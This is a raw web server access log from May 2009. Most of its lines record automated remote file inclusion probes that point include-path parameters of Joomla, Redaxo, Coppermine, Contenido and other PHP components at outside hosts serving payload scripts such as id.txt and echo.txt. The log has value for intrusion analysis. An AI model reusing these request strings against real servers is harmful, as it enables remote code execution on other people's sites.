195.34.78.110 - - [23/May/2009:02:36:34 -0400] "GET /logs/access_log.Q109050300//administrator/components/com_virtuemart/compat.joomla1.5.php?dirname[__FILE__]=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:02:36:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.137.51 - - [23/May/2009:02:36:52 -0400] "GET /logs/access_log.Q108111500/errors.php?error=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
59.120.3.108 - - [23/May/2009:02:36:57 -0400] "GET /logs/error_log.Q109012200/index.php?option=com_custompages&cpage=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
59.120.3.108 - - [23/May/2009:02:37:16 -0400] "GET /logs/error_log.Q108110500/index.php?option=com_custompages&cpage=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
59.120.3.108 - - [23/May/2009:02:37:17 -0400] "GET /logs/error_log.Q108112600/index.php?option=com_custompages&cpage=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
91.121.137.51 - - [23/May/2009:02:37:29 -0400] "GET /logs/access_log.Q109020600/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:37:31 -0400] "GET /logs/access_log.Q109020600/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
91.149.157.130 - - [23/May/2009:02:38:14 -0400] "GET /logs/access_log.Q108110900/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.805"
91.149.157.130 - - [23/May/2009:02:38:14 -0400] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
91.149.157.130 - - [23/May/2009:02:38:14 -0400] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:38:18 -0400] "GET /logs/access_log.Q108111500/errors.php?error=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
59.120.3.108 - - [23/May/2009:02:38:27 -0400] "GET /logs/access_log.Q108110500/index.php?option=com_custompages&cpage=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
59.120.3.108 - - [23/May/2009:02:38:32 -0400] "GET /logs/access_log.Q109042600/index.php?option=com_custompages&cpage=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
64.34.181.87 - - [23/May/2009:02:38:38 -0400] "GET /logs/access_log.Q109020600/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.803"
195.56.77.54 - - [23/May/2009:02:38:41 -0400] "GET /logs/access_log.Q108062400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
195.56.77.54 - - [23/May/2009:02:38:44 -0400] "GET /logs/access_log.Q108051700/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
91.121.137.51 - - [23/May/2009:02:38:46 -0400] "GET /logs/access_log.Q108110900/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:38:46 -0400] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:38:46 -0400] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
91.149.157.130 - - [23/May/2009:02:39:08 -0400] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
59.120.3.108 - - [23/May/2009:02:39:20 -0400] "GET /index.php?option=com_custompages&cpage=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
140.128.99.10 - - [23/May/2009:02:39:29 -0400] "GET /logs/access_log.Q108081700%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 268 "-" "libwww-perl/5.76"
91.149.157.130 - - [23/May/2009:02:39:42 -0400] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
216.246.124.211 - - [23/May/2009:02:40:04 -0400] "GET /logs/access_log.Q108053100%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
216.246.124.211 - - [23/May/2009:02:40:04 -0400] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
216.246.124.211 - - [23/May/2009:02:40:04 -0400] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
91.149.157.130 - - [23/May/2009:02:40:21 -0400] "GET /logs/error_log.Q109050500//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.805"
91.149.157.130 - - [23/May/2009:02:40:21 -0400] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
91.149.157.130 - - [23/May/2009:02:40:21 -0400] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
91.149.157.130 - - [23/May/2009:02:40:29 -0400] "GET //include.php?path[docroot]=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:41:05 -0400] "GET /logs/error_log.Q109050500//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:41:05 -0400] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:41:06 -0400] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
211.241.40.51 - - [23/May/2009:02:41:07 -0400] "GET /logs/access_log.Q108112400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
211.241.40.51 - - [23/May/2009:02:41:08 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
211.241.40.51 - - [23/May/2009:02:41:08 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
123.143.98.5 - - [23/May/2009:02:41:21 -0400] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
123.143.98.5 - - [23/May/2009:02:41:21 -0400] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
123.143.98.5 - - [23/May/2009:02:41:22 -0400] "GET /logs/access_log.Q108082200//modules/coppermine/themes/default/theme.php?THEME_DIR=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
209.59.12.99 - - [23/May/2009:02:41:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.223.51.15 - - [23/May/2009:02:41:57 -0400] "GET /logs/access_log.Q108051700/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
91.121.137.51 - - [23/May/2009:02:42:11 -0400] "GET /logs/access_log.Q109051000//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
91.149.157.130 - - [23/May/2009:02:42:13 -0400] "GET /logs/access_log.Q109051000//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
123.143.98.5 - - [23/May/2009:02:42:21 -0400] "GET /logs/access_log.Q108112300//modules/coppermine/themes/default/theme.php?THEME_DIR=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
210.200.170.28 - - [23/May/2009:02:42:28 -0400] "GET /index.php?option=com_custompages&cpage=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
195.34.78.110 - - [23/May/2009:02:42:40 -0400] "GET /?option=com_content&do_pdf=1&id=30//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indoirc.go.ro/idB.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
195.34.78.110 - - [23/May/2009:02:42:40 -0400] "GET //export.php?mosConfig_absolute_path=http://indoirc.go.ro/idB.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
87.230.85.142 - - [23/May/2009:02:42:52 -0400] "GET //skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:02:42:52 -0400] "GET /logs/access_log.Q109042600//skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:02:42:52 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:02:43:03 -0400] "GET //skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:02:43:03 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:02:43:03 -0400] "GET /logs/access_log.Q109042600%20%20//skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
210.200.170.28 - - [23/May/2009:02:43:05 -0400] "GET /logs/access_log.Q109042600/index.php?option=com_custompages&cpage=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
210.200.170.28 - - [23/May/2009:02:43:09 -0400] "GET /index.php?option=com_custompages&cpage=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
210.200.170.28 - - [23/May/2009:02:43:12 -0400] "GET /logs/index.php?option=com_custompages&cpage=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
91.121.137.51 - - [23/May/2009:02:43:27 -0400] "GET /logs/access_log.Q109051200//include.php?path[docroot]=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:43:27 -0400] "GET //include.php?path[docroot]=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:43:27 -0400] "GET /logs//include.php?path[docroot]=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
91.149.157.130 - - [23/May/2009:02:43:43 -0400] "GET /logs/access_log.Q109050700/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
66.249.72.114 - - [23/May/2009:02:44:05 -0400] "GET /images/logo_3.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
216.17.99.13 - - [23/May/2009:02:44:25 -0400] "GET /logs/access_log.Q109042600%20%20//skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:44:25 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:44:25 -0400] "GET //skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:44:31 -0400] "GET //skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:44:32 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:44:33 -0400] "GET /logs/access_log.Q109042600//skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:44:37 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:44:37 -0400] "GET //skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:44:38 -0400] "GET /logs/access_log.Q109042600//skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:44:39 -0400] "GET //skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:44:40 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:44:41 -0400] "GET /logs/access_log.Q109042600%20%20//skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:44:47 -0400] "GET //skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:44:48 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:44:52 -0400] "GET /logs/access_log.Q109042600//skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:44:56 -0400] "GET //skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:44:58 -0400] "GET /logs/access_log.Q109042600%20%20//skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:44:59 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:45:02 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:45:02 -0400] "GET /logs/access_log.Q109042600%20%20//skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:45:02 -0400] "GET //skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:45:02 -0400] "GET //skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:45:02 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:45:03 -0400] "GET /logs/access_log.Q109042600//skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:45:30 -0400] "GET //virtuemart_parser.php?mosConfig_absolute_path=http://indoirc.go.ro/idB.txt??? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
195.34.78.110 - - [23/May/2009:02:45:31 -0400] "GET //administrator/components/com_virtuemart/compat.joomla1.5.php?dirname[__FILE__]=http://indoirc.go.ro/idB.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
91.149.157.130 - - [23/May/2009:02:45:43 -0400] "GET /logs/access_log.Q109051200//include.php?path[docroot]=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
91.149.157.130 - - [23/May/2009:02:45:43 -0400] "GET //include.php?path[docroot]=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
91.149.157.130 - - [23/May/2009:02:45:44 -0400] "GET /logs//include.php?path[docroot]=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
66.223.51.15 - - [23/May/2009:02:46:05 -0400] "GET /index.php?option=com_mmp&Itemid=&mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
66.223.51.15 - - [23/May/2009:02:46:05 -0400] "GET /logs/index.php?option=com_mmp&Itemid=&mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
64.34.181.87 - - [23/May/2009:02:46:11 -0400] "GET /logs/access_log.Q109050700/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
82.151.132.176 - - [23/May/2009:02:46:17 -0400] "GET /logs/access_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
82.151.132.176 - - [23/May/2009:02:46:17 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
82.151.132.176 - - [23/May/2009:02:46:17 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
82.151.132.176 - - [23/May/2009:02:46:21 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:02:46:34 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:02:46:34 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:02:46:34 -0400] "GET /logs/access_log.Q108110900//modules/agendax/addevent.inc.php?agendax_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
64.34.181.87 - - [23/May/2009:02:46:44 -0400] "GET /logs/access_log.Q108110900/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.803"
64.34.181.87 - - [23/May/2009:02:46:44 -0400] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
64.34.181.87 - - [23/May/2009:02:46:44 -0400] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
209.59.12.99 - - [23/May/2009:02:46:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.223.51.15 - - [23/May/2009:02:46:47 -0400] "GET /index.php?option=com_mmp&Itemid=&mosConfig_absolute_path=http://minorblunders.com/orca.do?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
195.56.77.54 - - [23/May/2009:02:47:40 -0400] "GET /index.php?option=com_mmp&Itemid=&mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
195.56.77.54 - - [23/May/2009:02:47:40 -0400] "GET /logs/index.php?option=com_mmp&Itemid=&mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
64.34.181.87 - - [23/May/2009:02:47:47 -0400] "GET /logs/error_log.Q109050500//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.803"
64.34.181.87 - - [23/May/2009:02:47:47 -0400] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
64.34.181.87 - - [23/May/2009:02:47:47 -0400] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
123.143.98.5 - - [23/May/2009:02:48:22 -0400] "GET /logs/access_log.Q108082200%20//modules/coppermine/themes/default/theme.php?THEME_DIR=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
82.151.132.176 - - [23/May/2009:02:48:40 -0400] "GET /logs/access_log.Q108121400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
82.151.132.176 - - [23/May/2009:02:48:40 -0400] "GET /logs/access_log.Q108072400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
210.200.170.28 - - [23/May/2009:02:48:42 -0400] "GET /logs/access_log.Q108110500/index.php?option=com_custompages&cpage=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
66.223.51.15 - - [23/May/2009:02:49:09 -0400] "GET /logs/error_log.Q108122800/index.php?option=com_mmp&Itemid=&mosConfig_absolute_path=http://minorblunders.com/orca.do?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
66.223.51.15 - - [23/May/2009:02:49:09 -0400] "GET /index.php?option=com_mmp&Itemid=&mosConfig_absolute_path=http://minorblunders.com/orca.do?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
66.223.51.15 - - [23/May/2009:02:49:10 -0400] "GET /logs/index.php?option=com_mmp&Itemid=&mosConfig_absolute_path=http://minorblunders.com/orca.do?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
91.121.137.51 - - [23/May/2009:02:49:16 -0400] "GET /logs/access_log.Q109050700//include.php?path[docroot]=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:49:16 -0400] "GET //include.php?path[docroot]=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:49:16 -0400] "GET /logs//include.php?path[docroot]=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
216.17.99.13 - - [23/May/2009:02:49:37 -0400] "GET //skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:49:37 -0400] "GET /logs/access_log.Q109051200//skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:49:38 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:02:49:51 -0400] "GET //skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
91.121.137.51 - - [23/May/2009:02:49:51 -0400] "GET /logs/access_log.Q109021500/admin.php?cal_dir=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:49:51 -0400] "GET /admin.php?cal_dir=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:49:52 -0400] "GET /logs/admin.php?cal_dir=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
216.17.99.13 - - [23/May/2009:02:49:52 -0400] "GET /logs/access_log.Q109051200//skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
